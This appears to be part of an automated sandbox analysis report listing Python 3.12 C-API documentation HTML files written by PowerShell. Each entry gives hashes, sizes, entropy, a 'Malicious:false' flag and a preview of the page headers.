                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Bytes Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/bytes.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These functions raise TypeError when expecting a bytes parameter and called with a non-bytes parameter." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These functions raise TypeError when expecting a bytes parameter and called with a non-bytes parameter." />..<meta property="og:image:width" content="200" />..<meta pro

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\call.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2016), with CRLF line terminators
                              Category:dropped
                              Size (bytes):71486
                              Entropy (8bit):4.9168857488632725
                              Encrypted:false
                              SSDEEP:
                              MD5:6C78E3C5F7710C32C1C79C6F85DD88A5
                              SHA1:817E1E09A124DD4D89F2A8A5C0DD7769C1FAEE4E
                              SHA-256:482D4441A2C0A0FAD02699DB76BAEEB230C742624E973CBEFD109DA44075A484
                              SHA-512:8AA9DEEF38C1F8B5E51302996D3A4538D5DB5A489DE7A6D9C1C7583E3E2E23898815B30CF8D827BF8FA6590D7C20875883942AE1E09A65C390770D643C31C651
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Call Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/call.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="CPython supports two different calling protocols: tp_call and vectorcall. The tp_call Protocol: Instances of classes that set tp_call are callable. The signature of the slot is: A call is made usin..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="CPython supports two different calling protocols: tp_call and vectorcall

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\capsule.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1156), with CRLF line terminators
                              Category:dropped
                              Size (bytes):36464
                              Entropy (8bit):4.840757880078915
                              Encrypted:false
                              SSDEEP:
                              MD5:D4737B36C8139F229E8BD3B9678E56F6
                              SHA1:06DE3416092A1E197D898DAA8D8B43E4E3F2F121
                              SHA-256:91DD68E0DFE23719AACAB9E09510B82B8AD3DB7E4D78E169FF797B73717D6CF4
                              SHA-512:05FAEAB61270D65287ECB1675AAD45F119A57597C0B429784B62BAC35CF3F8EA81DF8DA1A19E93EB400E91790EB9680A85F9B9FDFC9642D21277713D3A3F1EB9
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Capsules" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/capsule.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Refer to Providing a C API for an Extension Module for more information on using these objects." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Refer to Providing a C API for an Extension Module for more information on using these objects." />..<meta property="og:image:width" content="200" />..<meta property="og:image:hei

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\cell.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (864), with CRLF line terminators
                              Category:dropped
                              Size (bytes):21181
                              Entropy (8bit):4.870153602982891
                              Encrypted:false
                              SSDEEP:
                              MD5:0C1D0AA7B6BC97311C45670DC76634CA
                              SHA1:BCE9B1E95363BFDB8FBD157967B450DC8B59E28E
                              SHA-256:170620D563439C6C53135899827A0E904DF8FF96B419AC92EE59A5DA8DAA0A3C
                              SHA-512:F220472843C2AB6F881A04804F6854FD9DD1BB49C6EADD37463CB33B0636F0D8D1759760FDF0619CDF7833AC3EF12D78C10C7A050E7F94108DC26AAC63DF8CD1
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Cell Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/cell.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content=".Cell. objects are used to implement variables referenced by multiple scopes. For each such variable, a cell object is created to store the value; the local variables of each stack frame that refer..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content=".Cell. objects are used to implement variables referenced by mult

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\code.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (4446), with CRLF line terminators
                              Category:dropped
                              Size (bytes):55705
                              Entropy (8bit):4.843599721590231
                              Encrypted:false
                              SSDEEP:
                              MD5:710C2BE9619FB179A6E5F08B364931F9
                              SHA1:E070E54A56D86A9879EE91DCE1C22C513492BF0C
                              SHA-256:FAFCA581AD0AC320BC255CBD4F3F4BC396426D3AA1214FACE26D980DF5D9ADC4
                              SHA-512:C1F7441A080514097072548A0025946ED1AD2C5BE0A418624102245744FD28BBAC0BE8B77E81E3656AE7A1A5BE72F4D8A73FACD411C7793F0577498E470AF0C8
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Code Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/code.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Code objects are a low-level detail of the CPython implementation. Each one represents a chunk of executable code that hasn.t yet been bound into a function. Extra information: To support low-level..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Code objects are a low-level detail of the CPython implementation. Each

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\codec.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1274), with CRLF line terminators
                              Category:dropped
                              Size (bytes):43417
                              Entropy (8bit):4.83612680829369
                              Encrypted:false
                              SSDEEP:
                              MD5:5A84BB66E9CD299F3331A17301B25AD9
                              SHA1:1B6A4829DD7B8DBCDBC55A45EB3F2BDA056B0116
                              SHA-256:9B68DBF25DFAD19BAD6755CC38E8C1189E2E97EF6E1612C6FBC47CDC35AD061B
                              SHA-512:E58E65654FA3CB6D6A2C7C1D33474CD921F71D1F44466288662A4DF1333197E67554FD9AB66F9A9E104725B5DD2F68B8CE33725B7A4BD4E20C7D19CC0882F3A0
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Codec registry and support functions" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/codec.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Codec lookup API: In the following functions, the encoding string is looked up converted to all lower-case characters, which makes encodings looked up through this mechanism effectively case-insens..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Codec lookup API: In the following functions, th

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\complex.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (833), with CRLF line terminators
                              Category:dropped
                              Size (bytes):34547
                              Entropy (8bit):4.892106689102129
                              Encrypted:false
                              SSDEEP:
                              MD5:637098068684E175F04062C3C86C5785
                              SHA1:C5D68268AD9EFC448BC82858F376B48C3D4F707B
                              SHA-256:42E6884E3139551843087EDDB5814AB5738BA81430725141C59055B6FACFA0F3
                              SHA-512:DFFFC0449367E8ADFC20DF4A8BA25597B373F690AC41C325B10D7054B52A076A427D39D22DC1C83B5591C2870D6D0DE954C7DC7094507AD541FAF73040922C10
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Complex Number Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/complex.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python.s complex number objects are implemented as two distinct types when viewed from the C API: one is the Python object exposed to Python programs, and the other is a C structure which represent..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python.s complex number objects are implemented as two d

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\concrete.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):25525
                              Entropy (8bit):4.891256045159486
                              Encrypted:false
                              SSDEEP:
                              MD5:E873E4762DFC00724E59871CAFF91A6F
                              SHA1:91EB19FA9402C48D88163C616ED06A7FA275C2F2
                              SHA-256:A680617C9E00485FB0B6FD8B597B6AFAD9EC51DCCE54485587689E9FE14BED04
                              SHA-512:47EC7C8893917C65428C7B14D2F943B555A6FAF5138B3D86EFA13562DEC04A4466A1B8D35860596A3EB19A9E507B0EA772F360FA3E2DFF5F40AD555821B88EBD
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Concrete Objects Layer" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/concrete.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The functions in this chapter are specific to certain Python object types. Passing them an object of the wrong type is not a good idea; if you receive an object from a Python program and you are no..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The functions in this chapter are specific to certain Pytho

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\contextvars.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1200), with CRLF line terminators
                              Category:dropped
                              Size (bytes):33749
                              Entropy (8bit):4.8817079061883515
                              Encrypted:false
                              SSDEEP:
                              MD5:CE70A621DB9EC2C554069CE7CF8BA0E1
                              SHA1:9197CEAE4094E4ED9C62C3DEECEEF103D0B4404F
                              SHA-256:FE1940FBC07D947B633C8830D7646D7268A7D35097B64F2FED7B0A89F397B9A5
                              SHA-512:7FC6B2D63208C101A8900FA0980C4111E77CD24970E31EABD7C7DC48AD7357A1882DEAA44381FAC879EE071A2749F4A75D028ED7E8A4CB7BF3CB960749E72015
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Context Variables Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/contextvars.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This section details the public C API for the contextvars module. Type-check macros: Context object management functions: Context variable functions:" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This section details the public C API for the contextvars module. Type-check macros: Context object mana

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\conversion.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1118), with CRLF line terminators
                              Category:dropped
                              Size (bytes):38240
                              Entropy (8bit):4.812067415404105
                              Encrypted:false
                              SSDEEP:
                              MD5:9DC1E315EB676DB4D4C6B8EC1962B93F
                              SHA1:59675D0484815E7768C6145C5B1BB41DA0B8DFD3
                              SHA-256:DE645D1D65FEE20E75803A3547AC2759E291E9A64DBA91B4EDB18A7455499E9E
                              SHA-512:BC30AE807A3EF048F2FE89F40C79C75CF41B3190CCCB48DCBE4E021DC0DF66676BF57E5065A212B9AB0F6A95E9112AA468AB3E2BB00C029B71D7D6F0D8C5D61E
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="String conversion and formatting" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/conversion.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Functions for number conversion and formatted string output. PyOS_snprintf() and PyOS_vsnprintf() wrap the Standard C library functions snprintf() and vsnprintf(). Their purpose is to guarantee con..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Functions for number conversion and formatted s

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\coro.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1283), with CRLF line terminators
                              Category:dropped
                              Size (bytes):16927
                              Entropy (8bit):4.870825245605953
                              Encrypted:false
                              SSDEEP:
                              MD5:354C9315BADA57E5E01BE150C9AD620E
                              SHA1:3F6218C4D1C34810AA4E7E371DEC6A66F72DA227
                              SHA-256:D19880403F68DA999DDC9AEDE58CCC9044C5D20434A824CE457D892B8EB974A0
                              SHA-512:6DAFCD25CA3D37B23BCF1F94999B14A8CF096D18098B1AEEBDB662A666DC16406F5A2739E3E45726CBF638729FA40F0DDD44C1587A9A428808E99A05F290B788
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Coroutine Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/coro.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Coroutine objects are what functions declared with an async keyword return." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Coroutine objects are what functions declared with an async keyword return." />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name=

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\datetime.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1557), with CRLF line terminators
                              Category:dropped
                              Size (bytes):67978
                              Entropy (8bit):4.885894045404287
                              Encrypted:false
                              SSDEEP:
                              MD5:B48FFF08046E2D30891A4210D31DFC5C
                              SHA1:5F7CD87A522AD7AC7EEEA65391DA4E7D74FAB510
                              SHA-256:1AD6F567798E87E6E2E6C2CE48E69014BC940DBBB508B521CEE3F39AE7B80F3A
                              SHA-512:6646EDDAB16CCC84BC4B8E73268BA9B1A92D87A3D86625F05155041A439E1D655437CA0587C449E6F242DEC2F26FE7FCECA60DEFA3324A110926AB29D1CD5B11
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="DateTime Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/datetime.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Various date and time objects are supplied by the datetime module. Before using any of these functions, the header file datetime.h must be included in your source (note that this is not included by..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Various date and time objects are supplied by the datetime module

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\descriptor.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1204), with CRLF line terminators
                              Category:dropped
                              Size (bytes):22641
                              Entropy (8bit):4.875868822676572
                              Encrypted:false
                              SSDEEP:
                              MD5:B43CBB6A201C8AF0EC526DF0FE0AD8BC
                              SHA1:1CADDCAF1DACD838C166BD451235FA20A524EA8A
                              SHA-256:2024222B523271BD0DA07918791579B3788B37449C660EB1FAAE86E8BDE29F0B
                              SHA-512:F5199EDBAC7CD41845B7309626937046026AC438C2C3F431595CAAE44F8885044478E184704A84B814F237E8927350F1B6317BA27037652B435910D38D07A2A9
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Descriptor Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/descriptor.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content=".Descriptors. are objects that describe some attribute of an object. They are found in the dictionary of type objects." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content=".Descriptors. are objects that describe some attribute of an object. They are found in the dictionary of type objects." />..<meta prope

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\dict.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1859), with CRLF line terminators
                              Category:dropped
                              Size (bytes):72321
                              Entropy (8bit):4.8170634575554105
                              Encrypted:false
                              SSDEEP:
                              MD5:ABFCD510A5957E738A8EC774ADA2E33E
                              SHA1:735549406A3622F195D657678DD1ED3742FF480F
                              SHA-256:8EF8773302AE46648026FDEAB109A5E40FDF6AC05DE7B52C1C553A72134D2116
                              SHA-512:EA214EE14A290972D50D92F514AC2ED06C01BE1CC048A009AFFCDCB6519EE587BBD5C6A4FBD79F25075B6865AF850E08C637A2C584F536FCF269F86075528937
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Dictionary Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/dict.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Dictionary Objects &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\exceptions.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1576), with CRLF line terminators
                              Category:dropped
                              Size (bytes):213783
                              Entropy (8bit):4.819670679843809
                              Encrypted:false
                              SSDEEP:
                              MD5:CE526A73BD478722DB418566C499F94E
                              SHA1:519D53C3E263019E16B8D32A403AD7E5E84586B8
                              SHA-256:1612FDF2700731DBC10AEE7B876221171594754161CAB66C3A193ADDB322E2FE
                              SHA-512:2E0C4A74514B5EEA799E4F84DDF5CB34FC62285BFD8E3015428F2A80301801FD1238470724B540C77B042A0AC20E60BC2BDD97ECF9FAB8548F6A6B41B65BFF78
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Exception Handling" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/exceptions.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The functions described in this chapter will let you handle and raise Python exceptions. It is important to understand some of the basics of Python exception handling. It works somewhat like the PO..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The functions described in this chapter will let you handle a

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\file.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2160), with CRLF line terminators
                              Category:dropped
                              Size (bytes):29104
                              Entropy (8bit):4.871777385163392
                              Encrypted:false
                              SSDEEP:
                              MD5:00F8228B186364B5601B9C042AF0ECB5
                              SHA1:0A635C565238261E420F077D73D2C80B2922DD76
                              SHA-256:9A5A1EF829620B298B47FF3DE75058580B6F1FCF577857554C701B772C77DBDC
                              SHA-512:D3A2C832660B038AFA54FCBA15814D02531A7577492CF7FC4C60DD5036DB7CB03EBCB8396346BA6A8DE2C2F6CFA6D49DF4F1C694382CD9D27810E37AA92D3D41
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="File Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/file.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These APIs are a minimal emulation of the Python 2 C API for built-in file objects, which used to rely on the buffered I/O ( FILE*) support from the C standard library. In Python 3, files and strea..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These APIs are a minimal emulation of the Python 2 C API for built-in fil

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\float.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (848), with CRLF line terminators
                              Category:dropped
                              Size (bytes):37993
                              Entropy (8bit):4.887751833127853
                              Encrypted:false
                              SSDEEP:
                              MD5:D371F31190459D34CB37234C1777C4E9
                              SHA1:00B5E1995846C3B71FF9402E8EB9634FDB289D43
                              SHA-256:89AF352BF421F0FCCB607747DE4885895091B6F251C75CC33794BFF22A206232
                              SHA-512:BCC7AD085F50BD357D5BA8911F8D2C11C92303260B1C2CC81B29C8D0FCB8A67EEAB86718E11FD2A119B48BFEB5F954DCC0A9726B6C376D1A842BF366A6DEEE80
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Floating Point Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/float.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Pack and Unpack functions: The pack and unpack functions provide an efficient platform-independent way to store floating-point values as byte strings. The Pack routines produce a bytes string from ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Pack and Unpack functions: The pack and unpack functions provi

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\frame.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1010), with CRLF line terminators
                              Category:dropped
                              Size (bytes):36833
                              Entropy (8bit):4.888510774866766
                              Encrypted:false
                              SSDEEP:
                              MD5:6AA9B1097EEDCEC6D3D62A056627DA70
                              SHA1:3113ED64A2B9815CC44EF41CA4250FA9CDF42DBB
                              SHA-256:0BDB9292C76B2830C287FE79E23845C6B157A3DC48C66378AD502676663174F0
                              SHA-512:7D8F75345B4DBA6664856098537BEB5C6DB00A400D23E72EB1E0C62EEEFEDCEAE598295A0B0774411F83EC9DA9635C19497AC9904C146844CF092FBDE8958EA8
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Frame Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/frame.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The PyEval_GetFrame() and PyThreadState_GetFrame() functions can be used to get a frame object. See also Reflection. Internal Frames: Unless using PEP 523, you will not need this." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The PyEval_GetFrame() and PyThreadState_GetFrame() functions can be used to get a frame obje

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\function.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1550), with CRLF line terminators
                              Category:dropped
                              Size (bytes):41352
                              Entropy (8bit):4.886201978528639
                              Encrypted:false
                              SSDEEP:
                              MD5:E1D9D4EB16CAAD47A8E14CFA57CE26CB
                              SHA1:49EBD5F98E6ADF1E49C819818FD676C41E872E1E
                              SHA-256:E388561BBC1EA809B5988A6E596F7E40C7AA500AF3699DD30FE51E931BBEE0E8
                              SHA-512:73AC31557E0B5BA7D81A47B2D8FF436E1C8A1069F8EF517C9F45F0A7420488DB4BB22A92034EEEA53DCDECFEE45883A24185ABFA48BEBD50020053C622E73561
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Function Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/function.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="There are a few functions specific to Python functions." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="There are a few functions specific to Python functions." />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />...

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\gcsupport.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1387), with CRLF line terminators
                              Category:dropped
                              Size (bytes):54027
                              Entropy (8bit):4.921374655045684
                              Encrypted:false
                              SSDEEP:
                              MD5:F2B982F211EA79B09C1F4FB35B250060
                              SHA1:97E0714BD0DC03C72FC834B99990A940C20BCA4C
                              SHA-256:8945B6192A23B8007108D9E4592B028369548818BF05E4BB5B3856A9D1A9B532
                              SHA-512:466D5AC8A781456F7BB2ABC32EA08DC89D8DA7FD72060183AB960C1EF32F3B85841329B61B53B7F0DC98A2715ADFF8AFC7635D2FC38294792AEA4E651E011EBE
                              Malicious:false
                              Reputation:unknown
